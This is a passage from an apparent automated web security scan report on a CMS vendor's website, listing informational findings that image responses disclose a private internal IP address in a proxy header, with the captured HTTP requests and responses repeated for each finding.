Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "502ed09fb6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:13 GMT
X-Powered-By: ASP.NET
Content-Length: 888
Date: Sat, 09 Apr 2011 00:18:26 GMT
X-Varnish: 1413198226
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
.......9.......v.........................................................................................................................
...[SNIP]...
14.151. http://www.motivitycms.com/images/form-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/form-bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/form-bg.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "2217ba0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:13 GMT
X-Powered-By: ASP.NET
Content-Length: 480
Date: Sat, 09 Apr 2011 00:18:24 GMT
X-Varnish: 1413197043
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................0....
...[SNIP]...
14.152. http://www.motivitycms.com/images/go-bullet.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/go-bullet.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/go-bullet.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.3.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "bcfe1fa0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:13 GMT
X-Powered-By: ASP.NET
Content-Length: 2525
Date: Sat, 09 Apr 2011 00:21:48 GMT
X-Varnish: 1413309065
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................'.'..
...[SNIP]...
14.153. http://www.motivitycms.com/images/google-web-optimzer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/google-web-optimzer.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/google-web-optimzer.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "f8e32ba0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:13 GMT
X-Powered-By: ASP.NET
Content-Length: 6327
Date: Sat, 09 Apr 2011 00:18:23 GMT
X-Varnish: 1413196933
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a...................~...i.. $..........................H.......................................;r........X[b.......2.........H|..........}..U...........p......JM.......<?.....F...................
...[SNIP]...
14.154. http://www.motivitycms.com/images/iconDollarSign.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/iconDollarSign.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/iconDollarSign.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "a2a26da0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 1074
Date: Sat, 09 Apr 2011 00:21:45 GMT
X-Varnish: 1413307790
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a......I.H..,B.Ab.c~.....f.gt.v....p.1./Y.Y...Q.Q    U.0.....;.:....\.
X    ..................6.42.0x.x...~....t.t......".!S.R;.9..-". q.pr.sMzM.........8.6...y.|.........\.^...{.{..-...............j
...[SNIP]...
14.155. http://www.motivitycms.com/images/insidebkgrd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/insidebkgrd.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/insidebkgrd.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "6158da0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 722
Date: Sat, 09 Apr 2011 00:18:21 GMT
X-Varnish: 1413195577
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a.............w..1AM4DP5EQ1@K6FR7GS9IU(7A-=H)8B*9C+:D)7A2CO3DP,;E4EQ-<F(5>)6?7HT/>H8IU4DO5EP6FQ8HS9IT&5>$2;%3<'6?+;E(7@&4=,<F)8A'5>-=G*9B.>H&3;3DO4EP5FQ6GR7HS$2:)9B*:C%3;+;D,<E."'$3;%4<&5='6>(7?.
...[SNIP]...
14.156. http://www.motivitycms.com/images/link-list-bottom-border.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/link-list-bottom-border.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/link-list-bottom-border.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "ba08ea0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 411
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197554
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...
14.157. http://www.motivitycms.com/images/link-list-top.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/link-list-top.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/link-list-top.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "92ffc5a0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 3154
Date: Sat, 09 Apr 2011 00:18:25 GMT
X-Varnish: 1413197497
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...
14.158. http://www.motivitycms.com/images/logo-div-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/logo-div-bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/logo-div-bg.jpg HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "6a86d0a0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 24015
Date: Sat, 09 Apr 2011 00:18:24 GMT
X-Varnish: 1413197041
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................j....
...[SNIP]...
14.159. http://www.motivitycms.com/images/natureair-screenshot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/natureair-screenshot.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/natureair-screenshot.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "58ae6a0b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:14 GMT
X-Powered-By: ASP.NET
Content-Length: 34314
Date: Sat, 09 Apr 2011 00:18:23 GMT
X-Varnish: 1413196806
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aW.J......_s...........Bc{...X/!....|......................eE)MQlvuw....................ml.Z...vu.Sl...-......gfh.......gh.ROhhw..............x&%%..N....T6...............50G......VVY.NJ$........
...[SNIP]...
14.160. http://www.motivitycms.com/images/nav/about.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/about.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/about.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "f6ec43a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:20 GMT
X-Powered-By: ASP.NET
Content-Length: 834
Date: Sat, 09 Apr 2011 00:18:24 GMT
X-Varnish: 1413197015
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aD.-....)9B)8B(7?'6>.........u..}..m.^o~.=F]o}ew..../>HVgt]o|m..7FQFWcUgtex....6FPEVbEVaO`l...N_l>OZM^j>NYFVbN^k7FPN_k6FO0?I(7A&5=&5>'5>...*9B$2;$3;'6?%3<$2:%4<%3;(7@)8A&4=......................
...[SNIP]...
14.161. http://www.motivitycms.com/images/nav/aboutOver.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/aboutOver.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/aboutOver.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.3.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "d23844a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:20 GMT
X-Powered-By: ASP.NET
Content-Length: 2101
Date: Sat, 09 Apr 2011 00:21:48 GMT
X-Varnish: 1413309067
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aD.-....BVc"/6.)0.#).%*.(..%+."(".6.#(... -4!/6.'-!-4.,2.'-.$*.&+".5 ,4 -3"/7.+1.(/.*0....$*...*9B.(/....*0............AUb...5FQ#08%3;.&+8IU0?I.........%2: ,2,6<...,7=.)/....'.Yae@S`.(-@Ta...".4.
...[SNIP]...
14.162. http://www.motivitycms.com/images/nav/customers.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/customers.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/customers.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "286044a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:20 GMT
X-Powered-By: ASP.NET
Content-Length: 1081
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196425
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89ah.-....)9B&5=(7?...'6>.........fx.x.....ex.x......../?G...0?I0?Ho..K\h...o..]o}Tes]n|o..\n|8HRex.8HSBR]9HS/?Hx..9ITAR\J[gBR^]o|Ter1@JL]hJ[h1@IAR]^o~(7A)8B...'5>&5>*9B$2;$3;'6?%3<$2:%4<%3;(7@)8A&
...[SNIP]...
14.163. http://www.motivitycms.com/images/nav/customersOver.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/customersOver.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/customersOver.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "7c665da4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:20 GMT
X-Powered-By: ASP.NET
Content-Length: 1777
Date: Sat, 09 Apr 2011 00:21:43 GMT
X-Varnish: 1413306937
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89ah.-.... ,2.%*.%+.$).#).*1....(/ +2.&+."(.+1.,3.)/.)/....,2.$*.%+.#(.*1.'.... ,3.*0.$*.......'-......(15............*9Buz})37AUbV]a9@E......0?I.).:LXGNR%3;flo%29$19@T`AUa<O[(16".6>Q]W^b"/7)8@*8@*
...[SNIP]...
14.164. http://www.motivitycms.com/images/nav/home.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/home.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/home.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "beaea0a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 836
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196187
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89aN.-....)8B)9B(7?...'6>x.....fx.......0?I...o../?G...]n|K\h8HRo.....ex.Tes]o|BR]ex....o..9IT...x..9HS0?H8HSJ[h(7A...&5='5>&5>*9B$2;$3;%3<$2:%4<%3;'6?(7@)8A&4=.....................................
...[SNIP]...
14.165. http://www.motivitycms.com/images/nav/marketing-platform.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/marketing-platform.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/marketing-platform.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/motivity-customers.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.2.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "44b6aea4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 1788
Date: Sat, 09 Apr 2011 00:21:45 GMT
X-Varnish: 1413307783
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..-....)9B&5=(7?...'6>......}..^o~ew.m..../>Hu..ex.m...=FVgtVgu^o}......]o|FWc7FP7FQ^p~N_l/>G>NY6FP]o}FWb>OZN^k6FOEVbUgtM^j.<F.=GEVa>OY/=G7GQO`l6EOM^k7GRu..u..n..GXcUgs}.....Vhu>NX]n|FVb0?I(7A)
...[SNIP]...
14.166. http://www.motivitycms.com/images/nav/marketing-platformOver.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/marketing-platformOver.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/marketing-platformOver.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=trttf2ecqtkqm445oqibypm4; X-Mapping-kohpmjdm=C4C3B245A5BFEB2BDDB0EE1B34A8B175; __utmz=1.1302308295.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1626305396.1302308295.1302308295.1302308295.1; __utmc=1; __utmb=1.1.10.1302308295

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "c865b2a4b6c0ca1:0"
Last-Modified: Thu, 11 Mar 2010 01:03:21 GMT
X-Powered-By: ASP.NET
Content-Length: 3192
Date: Sat, 09 Apr 2011 00:18:22 GMT
X-Varnish: 1413196248
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

GIF89a..-........)0"/6.(.".6!/6.&,."(.#(.#) -4.'-.'-.%+.%* -3 ,4.&+!-4".5.,2.+1.$*....$*"/7....(/.......*0... ,2.............&+......*48...v|,6<IQU*9B.*0....(-.......(/......w}.9AF...*49...X_dAUb...8
...[SNIP]...
14.167. http://www.motivitycms.com/images/nav/partners.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motivitycms.com
Path:   /images/nav/partners.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav/partners.gif HTTP/1.1
Host: www.motivitycms.com
Proxy-Connection: keep-alive
Referer: http://www.motivitycms.com/Google-Website-Optimizer-Technology-Partner.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
